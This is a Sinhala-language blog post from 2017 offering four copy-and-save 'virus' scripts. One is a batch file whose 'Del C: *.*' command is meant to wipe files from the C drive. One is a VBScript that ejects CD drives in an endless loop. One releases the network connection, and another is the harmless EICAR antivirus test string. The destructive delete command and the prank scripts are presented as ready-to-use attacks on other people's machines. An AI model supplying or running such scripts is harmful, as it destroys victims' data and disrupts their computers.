Monday, August 7, 2017

Virus කිහිපයක් නිර්මානය කරන විදිය



1.Dangerous virus එකක් හදන විදිය:

                මුලින්ම මේ code එක ඔයාලගෙ notepad එකට copy කර ගන්නකො..

@Echo off
Del C: *.* |y

                ඊට පස්සෙ virus.bat කියන name එකෙන් මේ file එක save කරන්න

                මේක ඔයාලගෙ pc එකේ නොකරන එක තමා හොද මේකෙන් hard එකේ  os   එකට අදාල data මෑකෙන්න ගන්නව.

2.CD/DVD ROM එකට ගේම දෙන විදිය:

                මුලින්ම මේ code එක ඔයාලගෙ notepad එකට copy කර ගන්නකො..

Set oWMP = CreateObject(“WMPlayer.OCX.7”)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
               
                ඊට පස්සෙ firewire.vbsකියන name එකෙන් මේ file එක save කරන්න

                මේකෙන් ඔයලාගෙ CD-ROM drive එක දිගට eject වෙන්න ගන්නව මේ virus එක නවත්තන්න නම් task manager ගිහිල්ල  Process Tab එකේ wscript.exe කියන එක  stop කරන්න.

3. ඔයාලගෙ virus guard එක වෑඩද බලන්න

                මුලින්ම මේ code එක ඔයාලගෙ notepad එකට copy කර ගන්නකො..

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
               
                ඊට පස්සෙ EICAR.COM කියන name එකෙන් මේ file එක save කරන්න

            Guard එක වෑඩනම් ඉතින් සෙනිකව මේ file  එක delete වෙයි.

4.machine Internet connection  එක block කරන විදිය

                මුලින්ම මේ code එක ඔයාලගෙ notepad එකට copy කර ගන්නකො..

@Echo off
Ipconfig /release

                ඊට පස්සෙ firewireBlock.bat කියන name එකෙන් මේ file එක save කරන්න

            එක ආයෙ ගන්නනම් මේ පහල තියෙන code එක notepad එකේ type කරල firewireGet.bat නමින් save කරලrun කරන්න.

@Echo off
Ipconfig/renew





0 comments:

Post a Comment